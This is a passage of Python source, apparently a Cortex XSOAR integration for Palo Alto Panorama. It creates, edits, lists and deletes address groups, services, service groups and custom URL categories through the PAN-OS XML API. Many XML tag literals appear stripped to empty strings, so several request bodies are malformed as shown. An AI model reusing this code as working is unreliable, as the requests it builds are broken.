\"\" + add_argument(match, 'filter', False)\n + \"\" + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True),\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_address_group_command(args: dict):\n \"\"\"\n Create an address group\n \"\"\"\n address_group_name = args['name']\n type_ = args['type']\n description = args.get('description')\n tags = argToList(args['tags']) if 'tags' in args else None\n match = args.get('match')\n addresses = argToList(args['addresses']) if 'addresses' in args else None\n if match and addresses:\n raise Exception('Please specify only one of the following: addresses, match.')\n if type_ == 'static':\n if not addresses:\n raise Exception('Please specify addresses in order to create a static address group.')\n if type_ == 'dynamic':\n if not match:\n raise Exception('Please specify a match in order to create a dynamic address group.')\n\n if type_ == 'static':\n result = panorama_create_static_address_group(address_group_name, addresses, description, tags)\n else:\n result = panorama_create_dynamic_address_group(address_group_name, match, description, tags)\n\n address_group_output = {\n 'Name': address_group_name,\n 'Type': type_\n }\n if DEVICE_GROUP:\n address_group_output['DeviceGroup'] = DEVICE_GROUP\n if match:\n address_group_output['Match'] = match\n if addresses:\n address_group_output['Addresses'] = addresses\n if 
description:\n address_group_output['Description'] = description\n if tags:\n address_group_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address group was created successfully.',\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_group_output\n }\n })\n\n\n@logger\ndef panorama_delete_address_group(address_group_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_address_group_command(address_group_name: str):\n \"\"\"\n Delete an address group\n \"\"\"\n\n address_group = panorama_delete_address_group(address_group_name)\n address_group_output = {'Name': address_group_name}\n if DEVICE_GROUP:\n address_group_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': address_group,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address group was deleted successfully.',\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_group_output\n }\n })\n\n\ndef panorama_edit_address_group_command(args: dict):\n \"\"\"\n Edit an address group\n \"\"\"\n address_group_name = args['name']\n type_ = args['type']\n match = args.get('match')\n element_to_add = argToList(args['element_to_add']) if 'element_to_add' in args else None\n element_to_remove = argToList(\n args['element_to_remove']) if 'element_to_remove' in args else None\n\n if type_ == 'dynamic':\n if not match:\n raise Exception('To edit a Dynamic Address group, Please provide a match.')\n match_param = add_argument_open(match, 'filter', False)\n match_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/dynamic/filter\"\n\n if type_ == 'static':\n if (element_to_add and element_to_remove) or (not element_to_add and not element_to_remove):\n raise Exception('To edit a Static Address group,'\n 'Please specify exactly one of the following: element_to_add, element_to_remove.')\n address_group_prev = panorama_get_address_group(address_group_name)\n address_group_list: List[str] = []\n if 'static' in address_group_prev:\n if address_group_prev['static']:\n address_group_list = argToList(address_group_prev['static']['member'])\n if element_to_add:\n addresses = list(set(element_to_add + address_group_list))\n else:\n addresses = [item for item in address_group_list if item not in element_to_remove]\n addresses_param = add_argument_list(addresses, 'member', False)\n addresses_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/static\"\n\n description = args.get('description')\n tags = argToList(args['tags']) if 'tags' in args else None\n\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'key': API_KEY,\n 'xpath': '',\n 'element': ''\n }\n\n address_group_output = {'Name': address_group_name}\n\n if DEVICE_GROUP:\n address_group_output['DeviceGroup'] = DEVICE_GROUP\n\n if type_ == 'dynamic' and match:\n params['xpath'] = match_path\n params['element'] = match_param\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Match'] = match\n\n if type_ == 'static' and addresses:\n params['xpath'] = addresses_path\n 
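# The empty string literals around addresses_param below look like stripped XML\n        # wrappers; in the PAN-OS config API a static member list is normally enclosed\n        # in '<static>...</static>' (an assumption from the public API, not this file).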
params['element'] = \"\" + addresses_param + \"\"\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Addresses'] = addresses\n\n if description:\n description_param = add_argument_open(description, 'description', False)\n description_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/description\"\n params['xpath'] = description_path\n params['element'] = description_param\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Description'] = description\n\n if tags:\n tag_param = add_argument_list(tags, 'tag', True)\n tag_path = XPATH_OBJECTS + \"address-group/entry[@name='\" + address_group_name + \"']/tag\"\n params['xpath'] = tag_path\n params['element'] = tag_param\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n address_group_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Address Group was edited successfully.',\n 'EntryContext': {\n \"Panorama.AddressGroups(val.Name == obj.Name)\": address_group_output\n }\n })\n\n\n''' Services Commands '''\n\n\ndef prettify_services_arr(services_arr: Union[dict, list]):\n if not isinstance(services_arr, list):\n return prettify_service(services_arr)\n\n pretty_services_arr = []\n for service in services_arr:\n pretty_service = {'Name': service['@name']}\n if DEVICE_GROUP:\n pretty_service['DeviceGroup'] = DEVICE_GROUP\n if 'description' in service:\n pretty_service['Description'] = service['description']\n if 'tag' in service and 'member' in service['tag']:\n pretty_service['Tags'] = service['tag']['member']\n\n protocol = ''\n if 'protocol' in service:\n if 'tcp' in service['protocol']:\n protocol = 'tcp'\n elif 'udp' in service['protocol']:\n protocol = 'udp'\n else:\n protocol = 'sctp'\n pretty_service['Protocol'] = protocol\n\n if 'port' in service['protocol'][protocol]:\n pretty_service['DestinationPort'] = service['protocol'][protocol]['port']\n if 'source-port' in service['protocol'][protocol]:\n pretty_service['SourcePort'] = service['protocol'][protocol]['source-port']\n\n pretty_services_arr.append(pretty_service)\n\n return pretty_services_arr\n\n\n@logger\ndef panorama_list_services(tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params['xpath'] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_services_command(tag: Optional[str]):\n \"\"\"\n Get all Services\n \"\"\"\n services_arr = panorama_list_services(tag)\n services_output = prettify_services_arr(services_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': services_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Services:', services_output,\n ['Name', 'Protocol', 'SourcePort', 'DestinationPort', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": services_output\n }\n })\n\n\ndef prettify_service(service: Dict):\n pretty_service = {\n 'Name': service['@name'],\n }\n if DEVICE_GROUP:\n pretty_service['DeviceGroup'] = DEVICE_GROUP\n if 'description' in service:\n pretty_service['Description'] = service['description']\n if 'tag' in 
service and 'member' in service['tag']:\n pretty_service['Tags'] = service['tag']['member']\n\n protocol = ''\n if 'protocol' in service:\n if 'tcp' in service['protocol']:\n protocol = 'tcp'\n elif 'udp' in service['protocol']:\n protocol = 'udp'\n else:\n protocol = 'sctp'\n pretty_service['Protocol'] = protocol\n\n if 'port' in service['protocol'][protocol]:\n pretty_service['DestinationPort'] = service['protocol'][protocol]['port']\n if 'source-port' in service['protocol'][protocol]:\n pretty_service['SourcePort'] = service['protocol'][protocol]['source-port']\n\n return pretty_service\n\n\n@logger\ndef panorama_get_service(service_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry[@name='\" + service_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_service_command(service_name: str):\n \"\"\"\n Get a service\n \"\"\"\n\n service = panorama_get_service(service_name)\n service_output = prettify_service(service)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Address:', service_output,\n ['Name', 'Protocol', 'SourcePort', 'DestinationPort', 'Description', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": service_output\n }\n })\n\n\n@logger\ndef panorama_create_service(service_name: str, protocol: str, destination_port: str,\n source_port: str = None, description: str = None, tags: list = None):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry[@name='\" + service_name + \"']\",\n 'key': API_KEY,\n 'element': '' + '<' + protocol + '>'\n + add_argument(destination_port, 'port', False)\n + add_argument(source_port, 'source-port', False)\n + '' + ''\n + add_argument(description, 'description', False)\n + add_argument_list(tags, 'tag', True)\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_service_command(args: dict):\n \"\"\"\n Create a service object\n \"\"\"\n service_name = args['name']\n protocol = args['protocol']\n destination_port = args['destination_port']\n source_port = args.get('source_port')\n description = args.get('description')\n tags = argToList(args['tags']) if 'tags' in args else None\n\n service = panorama_create_service(service_name, protocol, destination_port, source_port, description, tags)\n\n service_output = {\n 'Name': service_name,\n 'Protocol': protocol,\n 'DestinationPort': destination_port\n }\n if DEVICE_GROUP:\n service_output['DeviceGroup'] = DEVICE_GROUP\n if source_port:\n service_output['SourcePort'] = source_port\n if description:\n service_output['Description'] = description\n if tags:\n service_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service was created successfully.',\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": service_output\n }\n })\n\n\n@logger\ndef panorama_delete_service(service_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service/entry[@name='\" + service_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 
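# A config-type request with action='delete' removes the node addressed by 'xpath';\n        # the empty 'element' parameter appears to be passed only for uniformity with\n        # the other delete helpers (it is not required by the PAN-OS XML API).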
'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_service_command(service_name: str):\n \"\"\"\n Delete a service\n \"\"\"\n\n service = panorama_delete_service(service_name)\n service_output = {'Name': service_name}\n if DEVICE_GROUP:\n service_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service was deleted successfully.',\n 'EntryContext': {\n \"Panorama.Services(val.Name == obj.Name)\": service_output\n }\n })\n\n\n''' Service Group Commands '''\n\n\ndef prettify_service_groups_arr(service_groups_arr: list):\n if not isinstance(service_groups_arr, list):\n return prettify_service_group(service_groups_arr)\n\n pretty_service_groups_arr = []\n for service_group in service_groups_arr:\n pretty_service_group = {\n 'Name': service_group['@name'],\n 'Services': service_group['members']['member']\n }\n if DEVICE_GROUP:\n pretty_service_group['DeviceGroup'] = DEVICE_GROUP\n if 'tag' in service_group and 'member' in service_group['tag']:\n pretty_service_group['Tags'] = service_group['tag']['member']\n\n pretty_service_groups_arr.append(pretty_service_group)\n\n return pretty_service_groups_arr\n\n\n@logger\ndef panorama_list_service_groups(tag: str = None):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry\",\n 'key': API_KEY\n }\n\n if tag:\n params[\"xpath\"] = f'{params[\"xpath\"]}[( tag/member = \\'{tag}\\')]'\n\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_list_service_groups_command(tag: Optional[str]):\n \"\"\"\n Get all address groups\n \"\"\"\n service_groups_arr = panorama_list_service_groups(tag)\n service_groups_output = prettify_service_groups_arr(service_groups_arr)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service_groups_arr,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Service groups:', service_groups_output, ['Name', 'Services', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_groups_output\n }\n })\n\n\ndef prettify_service_group(service_group: dict):\n pretty_service_group = {\n 'Name': service_group['@name'],\n 'Services': service_group['members']['member']\n }\n if DEVICE_GROUP:\n pretty_service_group['DeviceGroup'] = DEVICE_GROUP\n if 'tag' in service_group and 'member' in service_group['tag']:\n pretty_service_group['Tags'] = service_group['tag']['member']\n\n return pretty_service_group\n\n\n@logger\ndef panorama_get_service_group(service_group_name: str):\n params = {\n 'action': 'show',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_service_group_command(service_group_name: str):\n \"\"\"\n Get an address group\n \"\"\"\n\n result = panorama_get_service_group(service_group_name)\n pretty_service_group = prettify_service_group(result)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Service group:', pretty_service_group, ['Name', 
'Services', 'Tags'],\n removeNull=True),\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": pretty_service_group\n }\n })\n\n\ndef panorama_create_service_group(service_group_name: str, services: list, tags: list):\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']\",\n 'element': '' + add_argument_list(services, 'member', True) + ''\n + add_argument_list(tags, 'tag', True),\n 'key': API_KEY\n }\n\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_create_service_group_command(args: dict):\n \"\"\"\n Create a service group\n \"\"\"\n service_group_name = args['name']\n services = argToList(args['services'])\n tags = argToList(args['tags']) if 'tags' in args else None\n\n result = panorama_create_service_group(service_group_name, services, tags)\n\n service_group_output = {\n 'Name': service_group_name,\n 'Services': services\n }\n if DEVICE_GROUP:\n service_group_output['DeviceGroup'] = DEVICE_GROUP\n if tags:\n service_group_output['Tags'] = tags\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service group was created successfully.',\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_group_output\n }\n })\n\n\n@logger\ndef panorama_delete_service_group(service_group_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_service_group_command(service_group_name: str):\n \"\"\"\n Delete a service group\n \"\"\"\n\n service_group = panorama_delete_service_group(service_group_name)\n service_group_output = {'Name': service_group_name}\n if DEVICE_GROUP:\n service_group_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': service_group,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service group was deleted successfully.',\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_group_output\n }\n })\n\n\n@logger\ndef panorama_edit_service_group(service_group_name: str, services: List[str], tag: List[str]):\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'xpath': '',\n 'element': '',\n 'key': API_KEY,\n }\n\n if services:\n services_xpath = XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']/members\"\n services_element = '' + add_argument_list(services, 'member', False) + ''\n params['xpath'] = services_xpath\n params['element'] = services_element\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n if tag:\n tag_xpath = XPATH_OBJECTS + \"service-group/entry[@name='\" + service_group_name + \"']/tag\"\n tag_element = add_argument_list(tag, 'tag', True)\n params['xpath'] = tag_xpath\n params['element'] = tag_element\n result = http_request(\n URL,\n 'POST',\n body=params\n )\n\n return result\n\n\ndef panorama_edit_service_group_command(args: dict):\n \"\"\"\n Edit a service group\n \"\"\"\n service_group_name = args['name']\n services_to_add = argToList(args['services_to_add']) if 'services_to_add' in args else None\n services_to_remove = argToList(\n args['services_to_remove']) 
if 'services_to_remove' in args else None\n tag = argToList(args['tag']) if 'tag' in args else None\n\n if not services_to_add and not services_to_remove and not tag:\n raise Exception('Specify at least one of the following arguments: services_to_add, services_to_remove, tag')\n\n if services_to_add and services_to_remove:\n raise Exception('Specify at most one of the following arguments: services_to_add, services_to_remove')\n\n services: List[str] = []\n if services_to_add or services_to_remove:\n service_group_prev = panorama_get_service_group(service_group_name)\n service_group_list = argToList(service_group_prev['members']['member'])\n if services_to_add:\n services = list(set(services_to_add + service_group_list))\n else:\n services = [item for item in service_group_list if item not in services_to_remove]\n\n if len(services) == 0:\n raise Exception('A Service group must have at least one service.')\n\n result = panorama_edit_service_group(service_group_name, services, tag)\n\n service_group_output = {'Name': service_group_name}\n if DEVICE_GROUP:\n service_group_output['DeviceGroup'] = DEVICE_GROUP\n if len(services) > 0:\n service_group_output['Services'] = services\n if tag:\n service_group_output['Tag'] = tag\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Service group was edited successfully.',\n 'EntryContext': {\n \"Panorama.ServiceGroups(val.Name == obj.Name)\": service_group_output\n }\n })\n\n\n''' Custom URL Category Commands '''\n\n\ndef prettify_custom_url_category(custom_url_category: dict):\n pretty_custom_url_category = {\n 'Name': custom_url_category['@name'],\n }\n if DEVICE_GROUP:\n pretty_custom_url_category['DeviceGroup'] = DEVICE_GROUP\n\n if 'description' in custom_url_category:\n pretty_custom_url_category['Description'] = custom_url_category['description']\n\n # In PAN-OS 9.X changes to the default behavior were introduced regarding custom url categories.\n if 'type' in custom_url_category:\n pretty_custom_url_category['Type'] = custom_url_category['type']\n if pretty_custom_url_category['Type'] == 'Category Match':\n pretty_custom_url_category['Categories'] = custom_url_category['list']['member']\n else:\n pretty_custom_url_category['Sites'] = custom_url_category['list']['member']\n else:\n pretty_custom_url_category['Sites'] = custom_url_category['list']['member']\n\n return pretty_custom_url_category\n\n\n@logger\ndef panorama_get_custom_url_category(name: str):\n params = {\n 'action': 'get',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + name + \"']\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'GET',\n params=params,\n )\n\n return result['response']['result']['entry']\n\n\ndef panorama_get_custom_url_category_command(name: str):\n \"\"\"\n Get a custom url category\n \"\"\"\n\n custom_url_category = panorama_get_custom_url_category(name)\n custom_url_category_output = prettify_custom_url_category(custom_url_category)\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': custom_url_category,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Custom URL Category:', custom_url_category_output,\n ['Name', 'Type', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n 
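# The context key 'Panorama.CustomURLCategory(val.Name == obj.Name)' instructs the\n    # XSOAR context engine to merge this output with an existing context entry whose\n    # Name matches, rather than appending a duplicate object.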
})\n\n\n@logger\ndef panorama_create_custom_url_category(custom_url_category_name: str, type_: Any = None,\n sites: Optional[list] = None, categories: Optional[list] = None,\n description: str = None):\n # In PAN-OS 9.X changes to the default behavior were introduced regarding custom url categories.\n major_version = get_pan_os_major_version()\n element = add_argument(description, 'description', False)\n if major_version <= 8:\n if type_ or categories:\n raise Exception('The type and categories arguments are only relevant for PAN-OS 9.x versions.')\n element += add_argument_list(sites, 'list', True)\n else: # major is 9.x\n if not type_:\n raise Exception('The type argument is mandatory for PAN-OS 9.x versions.')\n if (not sites and not categories) or (sites and categories):\n raise Exception('Exactly one of the sites and categories arguments should be defined.')\n if (type_ == 'URL List' and categories) or (type_ == 'Category Match' and sites):\n raise Exception('URL List type is only for sites, Category Match is only for categories.')\n\n if type_ == 'URL List':\n element += add_argument_list(sites, 'list', True)\n else:\n element += add_argument_list(categories, 'list', True)\n element += add_argument(type_, 'type', False)\n\n params = {\n 'action': 'set',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + custom_url_category_name + \"']\",\n 'element': element,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n custom_url_category_output: Dict[str, Any] = {'Name': custom_url_category_name}\n if DEVICE_GROUP:\n custom_url_category_output['DeviceGroup'] = DEVICE_GROUP\n if description:\n custom_url_category_output['Description'] = description\n if type_:\n custom_url_category_output['Type'] = type_\n if sites:\n custom_url_category_output['Sites'] = sites\n else:\n custom_url_category_output['Categories'] = categories\n return result, custom_url_category_output\n\n\ndef panorama_create_custom_url_category_command(args: dict):\n \"\"\"\n Create a custom URL category\n \"\"\"\n custom_url_category_name = args['name']\n type_ = args['type'] if 'type' in args else None\n sites = argToList(args['sites']) if 'sites' in args else None\n categories = argToList(args['categories']) if 'categories' in args else None\n description = args.get('description')\n\n custom_url_category, custom_url_category_output = panorama_create_custom_url_category(custom_url_category_name,\n type_, sites, categories,\n description)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': custom_url_category,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Created Custom URL Category:', custom_url_category_output,\n ['Name', 'Type', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\n@logger\ndef panorama_delete_custom_url_category(custom_url_category_name: str):\n params = {\n 'action': 'delete',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + custom_url_category_name + \"']\",\n 'element': \"\",\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n return result\n\n\ndef panorama_delete_custom_url_category_command(custom_url_category_name: str):\n \"\"\"\n Delete a custom url category\n \"\"\"\n\n result = 
panorama_delete_custom_url_category(custom_url_category_name)\n custom_url_category_output = {'Name': custom_url_category_name}\n if DEVICE_GROUP:\n custom_url_category_output['DeviceGroup'] = DEVICE_GROUP\n\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['text'],\n 'HumanReadable': 'Custom URL category was deleted successfully.',\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\n@logger\ndef panorama_edit_custom_url_category(custom_url_category_name: str, type_: str, items: list,\n description: Optional[str] = None):\n major_version = get_pan_os_major_version()\n description_element = add_argument(description, 'description', False)\n items_element = add_argument_list(items, 'list', True)\n\n if major_version <= 8:\n if type_ == 'Category Match':\n raise Exception('The Categories argument is only relevant for PAN-OS 9.x versions.')\n element = f\"{description_element}{items_element}\"\n else:\n type_element = add_argument(type_, 'type', False)\n element = f\"{description_element}{items_element}{type_element}\"\n\n params = {\n 'action': 'edit',\n 'type': 'config',\n 'xpath': XPATH_OBJECTS + \"profiles/custom-url-category/entry[@name='\" + custom_url_category_name + \"']\",\n 'element': element,\n 'key': API_KEY\n }\n result = http_request(\n URL,\n 'POST',\n body=params,\n )\n\n custom_url_category_output: Dict[str, Any] = {'Name': custom_url_category_name,\n 'Type': type_}\n if DEVICE_GROUP:\n custom_url_category_output['DeviceGroup'] = DEVICE_GROUP\n if description:\n custom_url_category_output['Description'] = description\n if type_ == 'Category Match':\n custom_url_category_output['Categories'] = items\n else:\n custom_url_category_output['Sites'] = items\n\n return result, custom_url_category_output\n\n\ndef panorama_custom_url_category_add_items(custom_url_category_name: str, items: list, type_: str):\n \"\"\"\n Add sites or categories to a configured custom url category\n \"\"\"\n custom_url_category = panorama_get_custom_url_category(custom_url_category_name)\n if '@dirtyId' in custom_url_category:\n LOG(f'Found uncommitted item:\\n{custom_url_category}')\n raise Exception('Please commit the instance prior to editing the Custom URL Category.')\n description = custom_url_category.get('description')\n\n custom_url_category_items: List[str] = []\n if 'list' in custom_url_category:\n if custom_url_category['list']:\n custom_url_category_items = argToList(custom_url_category['list']['member'])\n\n merged_items = list((set(items)).union(set(custom_url_category_items)))\n\n result, custom_url_category_output = panorama_edit_custom_url_category(custom_url_category_name, type_,\n merged_items, description)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Updated Custom URL Category:', custom_url_category_output,\n ['Name', 'Type', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\ndef panorama_custom_url_category_remove_items(custom_url_category_name: str, items: list, type_: str):\n \"\"\"\n Add sites or categories to a configured custom url category\n \"\"\"\n custom_url_category = panorama_get_custom_url_category(custom_url_category_name)\n if '@dirtyId' in 
custom_url_category:\n LOG(f'Found uncommitted item:\\n{custom_url_category}')\n raise Exception('Please commit the instance prior to editing the Custom URL Category.')\n description = custom_url_category.get('description')\n\n if 'list' in custom_url_category:\n if 'member' in custom_url_category['list']:\n custom_url_category_items = custom_url_category['list']['member']\n if not custom_url_category_items:\n raise Exception('Custom url category does not contain sites or categories.')\n\n subtracted_items = [item for item in custom_url_category_items if item not in items]\n result, custom_url_category_output = panorama_edit_custom_url_category(custom_url_category_name, type_,\n subtracted_items, description)\n return_results({\n 'Type': entryTypes['note'],\n 'ContentsFormat': formats['json'],\n 'Contents': result,\n 'ReadableContentsFormat': formats['markdown'],\n 'HumanReadable': tableToMarkdown('Updated Custom URL Category:', custom_url_category_output,\n ['Name', 'Categories', 'Sites', 'Description'], removeNull=True),\n 'EntryContext': {\n \"Panorama.CustomURLCategory(val.Name == obj.Name)\": custom_url_category_output\n }\n })\n\n\ndef panorama_edit_custom_url_category_command(args: dict):\n custom_url_category_name = args['name']\n items = argToList(args['sites']) if 'sites' in args else argToList(args['categories'])\n type_ = \"URL List\" if 'sites' in args else \"Category Match\"\n if args['action'] == 'remove':\n panorama_custom_url_category_remove_items(custom_url_category_name, items, type_)\n else:\n panorama_custom_url_category_add_items(custom_url_category_name, items, type_)\n\n\n''' URL Filtering '''\n\n\n@logger\ndef panorama_get_url_category(url_cmd: str, url: str):\n params = {\n 'action': 'show',\n 'type': 'op',\n 'key': API_KEY,\n 'cmd': f'<{url_cmd}>{url}'\n }\n raw_result = http_request(\n URL,\n 'POST',\n body=params,\n )\n result = raw_result['response']['result']\n if 'Failed to query the cloud' in result:\n raise Exception('Failed to query the cloud. Please check your URL Filtering license.')\n\n if url_cmd == 'url-info-host':\n # The result in this case looks like so: \"Ancestors info:\\nBM:\\nURL.com,1,5,search-engines,, {some more info\n # here...}\" - The 4th element is the url category.\n category = result.split(',')[3]\n else:\n result = result.splitlines()[1]\n if url_cmd == 'url':\n category = result.split(' ')[1]\n else: # url-info-cloud\n category = result.split(',')[3]\n return category\n\n\ndef populate_url_filter_category_from_context(category: str):\n url_filter_category = demisto.dt(demisto.context(), f'Panorama.URLFilter(val.Category === \"{category}\")')\n if not url_filter_category:\n return []\n\n if type(url_filter_category) is list:\n return url_filter_category[0].get(\"URL\")\n else: # url_filter_category is a dict\n context_urls = url_filter_category.get(\"URL\", None) # pylint: disable=no-member\n if type(context_urls) is str:\n return [context_urls]\n else:\n return context_urls\n\n\ndef calculate_dbot_score(category: str, additional_suspicious: list, additional_malicious: list):\n \"\"\"translate a category to a dbot score. 
